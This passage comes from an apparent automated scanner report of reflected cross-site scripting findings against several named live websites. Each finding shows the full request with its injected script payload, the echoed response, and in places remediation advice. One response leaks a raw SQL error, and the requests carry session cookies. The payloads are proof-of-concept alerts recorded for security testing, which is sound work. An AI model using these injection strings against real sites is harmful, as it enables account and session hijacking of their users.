Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OPENDNS_ACCOUNT=529fbcc8cec610ec6661657a296dbfc8; __kti=1289593273346,http%3A%2F%2Fideabank.opendns.com%2Fupcoming.php%3Fca37d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ecc21d24e55d%3D1,; __ktv=5926-ef2-1156-d97312c41bfbc05; __utmx=207386316.00012306182230551517:3:3; __utmxx=207386316.00012306182230551517:1773685:2592000; __utmz=1.1290365594.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.298223981.1290365594.1290365594.1290365594.1; __qca=P0-1533459312-1290639885715; t=0-1298937600; LPUID=e8216e93-d9ac-9334-2527-6e77b41b058d

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Set-Cookie: OUS=deleted; expires=Wed, 25-Nov-2009 03:24:57 GMT; path=/; domain=.opendns.com
Connection: close
Date: Thu, 25 Nov 2010 03:24:58 GMT
Server: OpenDNS Guide

<html>
   <head>
       <title> </title>
       <script type="text/javascript">
       function bredir(d,u,r,v,c){var w,h,wd,hd,bi;var b=false;var p=false;var s=[[300,250,false],[250,250,false],[240,400,false],[336,2
...[SNIP]...
<body onLoad="window.location = bredir('intheknowit.com', 'intheknowit.com%2Fmodules%2Fform.swf%3Fform%3Dform1', '', 'error', '/main?url=intheknowit.com%2Fmodules%2Fform.swf%3Fform%3Dform1&4aec9\"><script>alert(1)</script>875e643c34a=1');" style="margin: 0px;">
...[SNIP]...

2.131. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a490"><script>alert(1)</script>347989f5cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a490\"><script>alert(1)</script>347989f5cd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?url=intheknowit%2Ecom%2Fmodules%2Fform%2Eswf%3Fform%3Dform1&7a490"><script>alert(1)</script>347989f5cd5=1 HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
Referer: http://www.optimaitconsulting.com/client_resources.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OPENDNS_ACCOUNT=529fbcc8cec610ec6661657a296dbfc8; __kti=1289593273346,http%3A%2F%2Fideabank.opendns.com%2Fupcoming.php%3Fca37d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ecc21d24e55d%3D1,; __ktv=5926-ef2-1156-d97312c41bfbc05; __utmx=207386316.00012306182230551517:3:3; __utmxx=207386316.00012306182230551517:1773685:2592000; __utmz=1.1290365594.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.298223981.1290365594.1290365594.1290365594.1; __qca=P0-1533459312-1290639885715; t=0-1298937600; LPUID=e8216e93-d9ac-9334-2527-6e77b41b058d

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Set-Cookie: OUS=deleted; expires=Wed, 25-Nov-2009 03:24:57 GMT; path=/; domain=.opendns.com
Connection: close
Date: Thu, 25 Nov 2010 03:24:58 GMT
Server: OpenDNS Guide

<html>
   <head>
       <title> </title>
       <script type="text/javascript">
       function bredir(d,u,r,v,c){var w,h,wd,hd,bi;var b=false;var p=false;var s=[[300,250,false],[250,250,false],[240,400,false],[336,2
...[SNIP]...
<iframe frameborder="0" src="/main?url=intheknowit.com%2Fmodules%2Fform.swf%3Fform%3Dform1&7a490\"><script>alert(1)</script>347989f5cd5=1" width="100%" height="100%">
...[SNIP]...

2.132. http://guide.opendns.com/main [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /main

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e23"style%3d"x%3aexpression(alert(1))"49965e6f584 was submitted in the url parameter. This input was echoed as 42e23"style="x:expression(alert(1))"49965e6f584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /main?url=intheknowit.com%2Fmodules%2Fform.swf%3Fform%3Dform142e23"style%3d"x%3aexpression(alert(1))"49965e6f584 HTTP/1.1
Host: guide.opendns.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=207386316.00012306182230551517:3:3; t=0-1298937600; __kti=1289593273346,http%3A%2F%2Fideabank.opendns.com%2Fupcoming.php%3Fca37d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ecc21d24e55d%3D1,; __utmxx=207386316.00012306182230551517:1773685:2592000; __utmz=1.1290365594.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ktv=5926-ef2-1156-d97312c41bfbc05; __utma=1.298223981.1290365594.1290365594.1290365594.1; OUS=deleted; LPUID=e8216e93-d9ac-9334-2527-6e77b41b058d; __qca=P0-1533459312-1290639885715; OPENDNS_ACCOUNT=529fbcc8cec610ec6661657a296dbfc8;

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Pragma: no-cache
P3P: policyref="http://www.opendns.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: LPSID=41ace5bf-8828-d5c4-6d6a-d41f963d8ec1; path=/; domain=opendns.com
Connection: close
Date: Thu, 25 Nov 2010 03:49:38 GMT
Server: OpenDNS Guide


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>OpenDNS</title>
   <link rel="stylesheet" href="htt
...[SNIP]...
<a target="_top" href="http://intheknowit.com/modules/form.swf?form=form142e23"style="x:expression(alert(1))"49965e6f584">
...[SNIP]...

2.133. http://navbar.api.canoe.ca/v1/navbar/partenaire+tourismexchange [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://navbar.api.canoe.ca
Path:   /v1/navbar/partenaire+tourismexchange

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3a965<a>c2e9b01b0fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v13a965<a>c2e9b01b0fc/navbar/partenaire+tourismexchange HTTP/1.1
Host: navbar.api.canoe.ca
Proxy-Connection: keep-alive
Referer: http://www.packageseeker.com/exchange/en/packageSeeker/home/travelDeals.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: canoe_lang=lang%3Aen%7Ctype%3Aauto; s_cc=true; undefined_s=First%20Visit; o_dslv=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 400 Bad Request
Date: Thu, 25 Nov 2010 03:27:29 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>navbar.api.canoe.ca error - 400 Bad Request</ti
...[SNIP]...
<em style="color:#888;">'v13a965<a>c2e9b01b0fc'</em>
...[SNIP]...

2.134. http://navbar.api.canoe.ca/v1/navbar/partenaire+tourismexchange [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://navbar.api.canoe.ca
Path:   /v1/navbar/partenaire+tourismexchange

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2562<a>1aabfbc2ad1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/navbarb2562<a>1aabfbc2ad1/partenaire+tourismexchange HTTP/1.1
Host: navbar.api.canoe.ca
Proxy-Connection: keep-alive
Referer: http://www.packageseeker.com/exchange/en/packageSeeker/home/travelDeals.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: canoe_lang=lang%3Aen%7Ctype%3Aauto; s_cc=true; undefined_s=First%20Visit; o_dslv=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 400 Bad Request
Date: Thu, 25 Nov 2010 03:27:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>navbar.api.canoe.ca error - 400 Bad Request</ti
...[SNIP]...
<em style="color:#888;">'navbarb2562<a>1aabfbc2ad1'</em>
...[SNIP]...

2.135. http://navbar.api.canoe.ca/v1/navbar/partenaire+tourismexchange [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://navbar.api.canoe.ca
Path:   /v1/navbar/partenaire+tourismexchange

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 44228--><a>a37786c9b8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /v1/navbar/partenaire+tourismexchange44228--><a>a37786c9b8f HTTP/1.1
Host: navbar.api.canoe.ca
Proxy-Connection: keep-alive
Referer: http://www.packageseeker.com/exchange/en/packageSeeker/home/travelDeals.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: canoe_lang=lang%3Aen%7Ctype%3Aauto; s_cc=true; undefined_s=First%20Visit; o_dslv=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:27:35 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12713

<!-- canoe navbar // 2010.11.24.22.27.35 / v1.2.5a / partenaire+tourismexchange44228--><a>a37786c9b8f / -->
<script type="text/javascript" src="http://static.navbar.canoe.ca/v1/js/external_writer.j
...[SNIP]...

2.136. http://waterlookiosk.com/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://waterlookiosk.com
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 17e02<a>bed71d6a365 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=17e02<a>bed71d6a365 HTTP/1.1
Host: waterlookiosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:59:58 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1320

mysql error: [1054: Unknown column 'a' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 17e02<a>bed71d6a365 ORDER BY name ASC")
<pre align=left> &nbsp; &nbsp
...[SNIP]...

2.137. http://waterlookiosk.com/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://waterlookiosk.com
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ee19c%3balert(1)//f7e25a8b573 was submitted in the categoryId parameter. This input was echoed as ee19c;alert(1)//f7e25a8b573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /directory.php?name=Consulting&categoryId=228ee19c%3balert(1)//f7e25a8b573 HTTP/1.1
Host: waterlookiosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:59:58 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1501

mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(1)//f7e25a8b573 ORDER BY name ASC' at
...[SNIP]...
<font face="Courier New,Courier">ADOConnection.Execute(SELECT parent_category_id FROM category WHERE category_id = 228ee19c;alert(1)//f7e25a8b573 ORDER BY name ASC, false)</font>
...[SNIP]...

2.138. http://wikitravel.org/en/Toronto/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikitravel.org
Path:   /en/Toronto/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a333e\'%3balert(1)//af8129f7b54 was submitted in the REST URL parameter 2. This input was echoed as a333e\\';alert(1)//af8129f7b54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /en/Torontoa333e\'%3balert(1)//af8129f7b54/x22 HTTP/1.1
Host: wikitravel.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 02:31:10 GMT
Server: Apache
Set-Cookie: wikitravel_ip=127.0.0.1; path=/; domain=.wikitravel.org
Content-Language: en, en
Vary: Accept-Encoding
Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67940693
Expires: Mon, 29 Sep 2008 18:06:17 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from wikitravel.org
X-Cache-Lookup: MISS from wikitravel.org:80
Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6)
Connection: close
Set-Cookie: BIGipServerwikitravel_pool=2918912172.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">
addOnloadHook(function () {
set_page_title('Torontoa333e\\';alert(1)//af8129f7b54/x22');
set_script_path('/wiki/en/index.php');
set_db_name('wikitravel_org_-_en');
set_admins('3,4,148,176,206,361,389,404,551,741,764,1111,1288,1399,1549,2493,2751,2752,3005,3115,3703,3934
...[SNIP]...

2.139. http://wikitravel.org/en/Toronto/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikitravel.org
Path:   /en/Toronto/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc88\'%3balert(1)//970f3d6ccde was submitted in the REST URL parameter 3. This input was echoed as cfc88\\';alert(1)//970f3d6ccde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /en/Toronto/x22cfc88\'%3balert(1)//970f3d6ccde HTTP/1.1
Host: wikitravel.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 02:31:27 GMT
Server: Apache
Set-Cookie: wikitravel_ip=127.0.0.1; path=/; domain=.wikitravel.org
Content-Language: en, en
Vary: Accept-Encoding
Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67940710
Expires: Mon, 29 Sep 2008 18:06:17 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from wikitravel.org
X-Cache-Lookup: MISS from wikitravel.org:80
Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6)
Connection: close
Set-Cookie: BIGipServerwikitravel_pool=2918912172.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">
addOnloadHook(function () {
set_page_title('Toronto/x22cfc88\\';alert(1)//970f3d6ccde');
set_script_path('/wiki/en/index.php');
set_db_name('wikitravel_org_-_en');
set_admins('3,4,148,176,206,361,389,404,551,741,764,1111,1288,1399,1549,2493,2751,2752,3005,3115,3703,3934,396
...[SNIP]...

2.140. http://wikitravel.org/en/Toronto/x22cfc88/%27%253Balert(1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikitravel.org
Path:   /en/Toronto/x22cfc88/%27%253Balert(1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de688\'%3balert(1)//6b3e2dc05ca was submitted in the REST URL parameter 2. This input was echoed as de688\\';alert(1)//6b3e2dc05ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /en/Torontode688\'%3balert(1)//6b3e2dc05ca/x22cfc88/%27%253Balert(1 HTTP/1.1
Host: wikitravel.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 04:00:37 GMT
Server: Apache
Content-Language: en, en
Vary: Accept-Encoding
Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946060
Expires: Mon, 29 Sep 2008 18:06:17 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from wikitravel.org
X-Cache-Lookup: MISS from wikitravel.org:80
Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">
addOnloadHook(function () {
set_page_title('Torontode688\\';alert(1)//6b3e2dc05ca/x22cfc88/\';alert(1');
set_script_path('/wiki/en/index.php');
set_db_name('wikitravel_org_-_en');
set_admins('3,4,148,176,206,361,389,404,551,741,764,1111,1288,1399,1549,2493,2751,2752,300
...[SNIP]...

2.141. http://wikitravel.org/en/Toronto/x22cfc88/%27%253Balert(1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikitravel.org
Path:   /en/Toronto/x22cfc88/%27%253Balert(1

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5b81\'%3balert(1)//b53a8185f07 was submitted in the REST URL parameter 3. This input was echoed as d5b81\\';alert(1)//b53a8185f07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /en/Toronto/x22cfc88d5b81\'%3balert(1)//b53a8185f07/%27%253Balert(1 HTTP/1.1
Host: wikitravel.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 04:00:48 GMT
Server: Apache
Content-Language: en, en
Vary: Accept-Encoding
Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946071
Expires: Mon, 29 Sep 2008 18:06:17 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from wikitravel.org
X-Cache-Lookup: MISS from wikitravel.org:80
Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">
addOnloadHook(function () {
set_page_title('Toronto/x22cfc88d5b81\\';alert(1)//b53a8185f07/\';alert(1');
set_script_path('/wiki/en/index.php');
set_db_name('wikitravel_org_-_en');
set_admins('3,4,148,176,206,361,389,404,551,741,764,1111,1288,1399,1549,2493,2751,2752,3005,3115,37
...[SNIP]...

2.142. http://wikitravel.org/en/Toronto/x22cfc88/%27%253Balert(1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikitravel.org
Path:   /en/Toronto/x22cfc88/%27%253Balert(1

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa44\'%3balert(1)//2843bd5ba94 was submitted in the REST URL parameter 4. This input was echoed as 4aa44\\';alert(1)//2843bd5ba94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /en/Toronto/x22cfc88/%27%253Balert(14aa44\'%3balert(1)//2843bd5ba94 HTTP/1.1
Host: wikitravel.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 04:00:58 GMT
Server: Apache
Content-Language: en, en
Vary: Accept-Encoding
Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946081
Expires: Mon, 29 Sep 2008 18:06:17 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from wikitravel.org
X-Cache-Lookup: MISS from wikitravel.org:80
Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">
addOnloadHook(function () {
set_page_title('Toronto/x22cfc88/\';alert(14aa44\\';alert(1)//2843bd5ba94');
set_script_path('/wiki/en/index.php');
set_db_name('wikitravel_org_-_en');
set_admins('3,4,148,176,206,361,389,404,551,741,764,1111,1288,1399,1549,2493,2751,2752,3005,3115,3703,3934,396
...[SNIP]...

2.143. http://wikitravel.org/en/Torontoa333e/%27%253Balert(1 [REST URL parameter 2]  previous  next

Summary

